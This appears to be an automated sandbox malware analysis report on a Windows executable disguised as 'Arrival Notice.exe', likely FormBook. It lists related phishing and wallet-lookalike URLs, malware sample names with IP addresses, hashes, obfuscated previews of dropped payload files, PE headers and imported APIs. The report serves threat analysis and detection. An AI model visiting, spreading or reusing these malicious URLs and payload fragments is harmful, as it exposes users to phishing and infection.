                http://cobsaiprologue.gitbook.io/usGet hashmaliciousUnknownBrowse
                • 104.18.25.61
                https://vpjjioou7.indylatinawrds.com:8443/impact?impact=d..**@c.*.comGet hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                https://13yxw.com/Get hashmaliciousUnknownBrowse
                • 104.21.56.75
                https://help-mettamskexteiin.gitbook.io/Get hashmaliciousUnknownBrowse
                • 104.18.25.61
                https://xybxguyw7.indylatinawrds.com:8443/impact?impact=b..*@t....**.comGet hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                https://home-start-trezor-io.github.io/Get hashmaliciousUnknownBrowse
                • 104.17.25.14
                http://kcrekanlogien.gitbook.io/usGet hashmaliciousUnknownBrowse
                • 104.18.25.61
                https://start-trenzor.webflow.io/Get hashmaliciousUnknownBrowse
                • 104.18.28.203
                DOMAINTECHNIKATshipping documents.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                LisectAVT_2403002A_87.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                • 213.145.228.16
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                • 213.145.228.16
                1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 213.145.228.16
                VPSQUANUSshipping documents.exeGet hashmaliciousFormBookBrowse
                • 23.251.54.212
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 23.251.54.212
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 23.251.54.212
                v9.exeGet hashmaliciousUnknownBrowse
                • 154.222.224.99
                1.exeGet hashmaliciousUnknownBrowse
                • 154.222.224.99
                v9.exeGet hashmaliciousUnknownBrowse
                • 154.222.224.99
                bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                • 69.165.74.76
                bot.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                • 69.165.74.76
                bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                • 69.165.74.76
                bot.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                • 69.165.74.76
                LOOPIASEshipping documents.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                http://tok2np0cklt.top/Get hashmaliciousUnknownBrowse
                • 194.9.94.85
                docs_pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85
                Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.86
                Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                • 194.9.94.85

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\23802I71

                Download File
                Process:C:\Windows\SysWOW64\clip.exe
                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                Category:dropped
                Size (bytes):114688
                Entropy (8bit):0.9746603542602881
                Encrypted:false
                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                MD5:780853CDDEAEE8DE70F28A4B255A600B
                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                Malicious:false
                Reputation:high, very likely benign file
                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\autCCA.tmp

                Download File
                Process:C:\Users\user\Desktop\Arrival Notice.exe
                File Type:data
                Category:dropped
                Size (bytes):270848
                Entropy (8bit):7.993180127687542
                Encrypted:true
                SSDEEP:6144:l84/Cc77f3IeJvt5Z6XpOMdLenbBpDJkLpdVUHBrbTAE:lJ/B773IeJvYIsiNpDCLXMbTAE
                MD5:E290D6547A68989D0EF23484354D3075
                SHA1:3751012B6048A0E623FBEDD0A8154F31D5502581
                SHA-256:9EC3490185591431762AAAEF3F1FC896DBE143DD57D007408BEBE43083E2C41F
                SHA-512:1C5AC6DF8211024CBD5F9B5D7DFA110C43AC1CF3A6E5129D075529E9757E3BAC87CCD136DF6053C3FB20C19E1426640EB9F065997D02711B727B8B0044E9490E
                Malicious:false
                Reputation:low
                Preview:.....HNIXh..<...v.S[..p3:...4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z.M4N@U.]X.G.y.3..l`&'9b#*');9].9T#Z!:j 6x:;'xY\zq.gn#%&6vECC|02Z5M4N7KK.e().ePU..-S.T..b().B....-S.T..d()..YQ2.-S.NJBSXHNI.u2ZyL5N_.z3XHNIX02Z.M6OEKISXXJIX02Z5M4Nn_BSXXNIX.6Z5MtNNZBSXJNI^02Z5M4NHJBSXHNIX.6Z5O4NNJBSZH..X0"Z5]4NNJRSXXNIX02Z%M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4N`>'+,HNI.?6Z5]4NNZFSXXNIX02Z5M4NNJBSxHN)X02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNI

                C:\Users\user\AppData\Local\Temp\autD09.tmp

                Download File
                Process:C:\Users\user\Desktop\Arrival Notice.exe
                File Type:data
                Category:dropped
                Size (bytes):43612
                Entropy (8bit):7.824936518463832
                Encrypted:false
                SSDEEP:768:NfNqB1xrmuToYNiZq5Zw+sQ96Ia/RbfVxQ5jWi+nOsV9Hurj2R7xK/u9lERB7Oug:ns1ToqiZiu/Q63tQ9+OgOrCa/uto5c2w
                MD5:2E7D19756B26D646A39A4C7C0548E1B1
                SHA1:B6D962F6B62765D56554F6320DF0ED06AE76B946
                SHA-256:0D412113E9DEF378A9BACA33142FBB0B86F5F4FB74E6394349E05A2B98819054
                SHA-512:19F5FC45E8FCE103CA42C00E1BDC701B2DC4218D9943A22521031EECC986DFEB4F33A81017BB17F1EC7440E3F4AE08C34D0A1C5E05401643265600395AD8F0C5
                Malicious:false
                Reputation:low
                Preview:EA06..P...+.y.Bg5.L.y..6.S..Z4.gK..*.9..m5.M.t...6..fs...eC..*.9.Fg0.L..Y..3.V........+S9.Nm2...T......L.....3.T&s.T.sI......>g4.M.UI..3.R.sZ4.aK..(S9.X...<)39.P..Rfs.T.iH.M+S9.bg6.M.U.....L.Up..3.Q.s.P..S...9.:g8.L.5y..3..fs...6.-'...6...jx.j.....Y..3.U.....iB...3i..l..N@..L.kM..)....AL.r.....f..NhS9.fm4.L..9.....j39.Jm3..Q@&E.....)...D....@B...8..K.(..g3.L.`'.H......T.}.T.C..LV..Y.....~..I.Bg0..6T`.8.x.L...%6g8...UI..3..s*D.eP.Li.9...B.6.@....+ .,..^.@y...g9.L...3.........U.....Sfsj0..Q...6...l..Tfs. ..h...@G......'.j..%T..*3i......$.......>U...U.. ...3.R.s....}.l..!fgT...si.8..UI.....(`&P.qN.L.....6..........S@$ ... ...3....4...Y..6.|.u..:l.xM..i.4..........KR.........D .@.IJ..@.@.....%....6.U..fh...6...@....V@:...T.s.2.....i.@.r...S@!..l.... -...U.L.@....J.....A....9..)P.M(.:,....!.....D..U)...|...GJH..D.....E.R....0.X...30...6.Q.5j ..J....6....Z .t..@.....4...p...L........E@.e0.......,r...........G.j.....a.....+ ....lT....%..(.i.Vm1.M).$

                C:\Users\user\AppData\Local\Temp\outbluffed

                Download File
                Process:C:\Users\user\Desktop\Arrival Notice.exe
                File Type:data
                Category:dropped
                Size (bytes):270848
                Entropy (8bit):7.993180127687542
                Encrypted:true
                SSDEEP:6144:l84/Cc77f3IeJvt5Z6XpOMdLenbBpDJkLpdVUHBrbTAE:lJ/B773IeJvYIsiNpDCLXMbTAE
                MD5:E290D6547A68989D0EF23484354D3075
                SHA1:3751012B6048A0E623FBEDD0A8154F31D5502581
                SHA-256:9EC3490185591431762AAAEF3F1FC896DBE143DD57D007408BEBE43083E2C41F
                SHA-512:1C5AC6DF8211024CBD5F9B5D7DFA110C43AC1CF3A6E5129D075529E9757E3BAC87CCD136DF6053C3FB20C19E1426640EB9F065997D02711B727B8B0044E9490E
                Malicious:false
                Reputation:low
                Preview:.....HNIXh..<...v.S[..p3:...4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z.M4N@U.]X.G.y.3..l`&'9b#*');9].9T#Z!:j 6x:;'xY\zq.gn#%&6vECC|02Z5M4N7KK.e().ePU..-S.T..b().B....-S.T..d()..YQ2.-S.NJBSXHNI.u2ZyL5N_.z3XHNIX02Z.M6OEKISXXJIX02Z5M4Nn_BSXXNIX.6Z5MtNNZBSXJNI^02Z5M4NHJBSXHNIX.6Z5O4NNJBSZH..X0"Z5]4NNJRSXXNIX02Z%M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4N`>'+,HNI.?6Z5]4NNZFSXXNIX02Z5M4NNJBSxHN)X02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNI

                C:\Users\user\AppData\Local\Temp\preinhered

                Download File
                Process:C:\Users\user\Desktop\Arrival Notice.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):86022
                Entropy (8bit):4.179065701160929
                Encrypted:false
                SSDEEP:1536:R+KzPMCgCEOpvfkgHvtlfWNmZ1iW6AUiZ:YK4RsRkgPjfiZmZ
                MD5:FB8640FC4CC82974E33E333DBEE4B02B
                SHA1:16F16F500F389E22C29592094F742EB2BCE5C075
                SHA-256:7BE58C7C4644155DB0F9758FEA273185D711D9B3E865B2673B6A9BE43F144408
                SHA-512:41464BC082DE350A6C4370DC2EBFFA1425FEDA257461E0AA46AEC67A7D0EBDCF3BCE79427FDFE743D8802806A0B6248BE5874EDEE75831BFC9CB754A03D7C671
                Malicious:false
                Reputation:low
                Preview:30X78P35V35W38G62O65F63K38W31F65H63O63E63A30R32C30U30Q30T30E35A36X35A37D62O38Z36S62A30T30H30E30U30D30P36G36P38J39I34P35V38O34J62T39K36K35F30K30B30V30D30E30I36T36G38I39J34H64Z38X36B62Y61A37X32W30T30Y30G30J30H30S36O36N38L39W35T35U38K38I62W38N36Y65R30J30O30S30O30Y30E36C36V38L39U34B35V38I61K62C39E36I35M30N30V30K30L30G30P36C36E38P39B34Y64X38S63U62O61Q36R63X30T30Q30A30A30X30L36T36Q38G39P35Q35F38B65R62O38B33F33U30R30T30K30E30V30U36V36R38I39I34P35Z39I30E62O39B33X32P30W30Q30F30V30S30D36U36M38H39I34T64K39Z32H62P61O32B65B30W30R30W30O30S30Y36R36Y38N39E35A35D39V34M62D38E36Y34Y30W30Q30Y30R30G30S36M36F38I39Q34H35F39P36H62Q39G36S63W30N30T30E30K30O30Y36Y36W38P39T34Q64L39Z38S62J61V36L63A30X30W30Q30V30G30V36B36J38C39Y35V35K39Q61A33T33K63N30I36T36T38V39P34C35Z39L63N62X39V36P65W30H30U30L30Q30M30Y36G36X38Y39P38V64L34G34E66K66B66R66N66P66W62M61V37H34J30C30X30J30J30X30F36K36N38C39G39J35O34D36S66R66K66H66T66V66S62F38D36V34T30F30N30C30Y30G30V36S36S38T39B38S35T34N38K66K66M66W66F66Y66B62Q39X36U63J30G30F30M30G30F3

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.174151192602831
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:Arrival Notice.exe
                File size:1'287'680 bytes
                MD5:f94ffbea567a61ade8409b8a854d6562
                SHA1:cd0e9b9c21111af31bb59d416e6edf49eb8aaf3e
                SHA256:f0cd4c3441a54c8b9f0d7aa5ba5066014d8eaefe9ddf6b87906354e043b627b5
                SHA512:f3fc585f537e67da41188da213fcdc0bdf8098bf2c3d8d767ae8a1849ebc1d179401951b2e7f6ead4097c8c70b7587b7788a978b18edee1033b59ab3badd37aa
                SSDEEP:24576:fqDEvCTbMWu7rQYlBQcBiT6rprG8aCgvQtoiS3OZ5Bk1Bw:fTvC/MTQYxsWR7aCAwoiS3OZc1
                TLSH:E955C00277C1C022FF9B92334B5AF6515BBC69260523E61F13A81DB9BE701B1563E7A3
                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                File Icon

                Icon Hash:aaf3e3e3938382a0

                Static PE Info

                General

                Entrypoint:0x420577
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66C27845 [Sun Aug 18 22:40:05 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:948cc502fe9226992dce9417f952fce3

                Entrypoint Preview

                Instruction
                call 00007F4968EFB7E3h
                jmp 00007F4968EFB0EFh
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F4968EFB2CDh
                mov dword ptr [esi], 0049FDF0h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 0049FDF8h
                mov dword ptr [ecx], 0049FDF0h
                ret
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F4968EFB29Ah
                mov dword ptr [esi], 0049FE0Ch
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 0049FE14h
                mov dword ptr [ecx], 0049FE0Ch
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, ecx
                lea eax, dword ptr [esi+04h]
                mov dword ptr [esi], 0049FDD0h
                and dword ptr [eax], 00000000h
                and dword ptr [eax+04h], 00000000h
                push eax
                mov eax, dword ptr [ebp+08h]
                add eax, 04h
                push eax
                call 00007F4968EFDE8Dh
                pop ecx
                pop ecx
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 0049FDD0h
                push eax
                call 00007F4968EFDED8h
                pop ecx
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, ecx
                lea eax, dword ptr [esi+04h]
                mov dword ptr [esi], 0049FDD0h
                push eax
                call 00007F4968EFDEC1h
                test byte ptr [ebp+08h], 00000001h
                pop ecx

                Rich Headers

                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x63af8.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1380000x7594.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0xd40000x63af80x63c003b124fc89a60797b0e022e2a61b412d3False0.933858082706767data7.90825595854727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x1380000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                RT_RCDATA0xdc7b80x5adc0data1.0003251289767843
                RT_GROUP_ICON0x1375780x76dataEnglishGreat Britain0.6610169491525424
                RT_GROUP_ICON0x1375f00x14dataEnglishGreat Britain1.25
                RT_GROUP_ICON0x1376040x14dataEnglishGreat Britain1.15
                RT_GROUP_ICON0x1376180x14dataEnglishGreat Britain1.25
                RT_VERSION0x13762c0xdcdataEnglishGreat Britain0.6181818181818182
                RT_MANIFEST0x1377080x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                Imports

                DLLImport
                WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                PSAPI.DLLGetProcessMemoryInfo
                IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                UxTheme.dllIsThemeActive
                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, 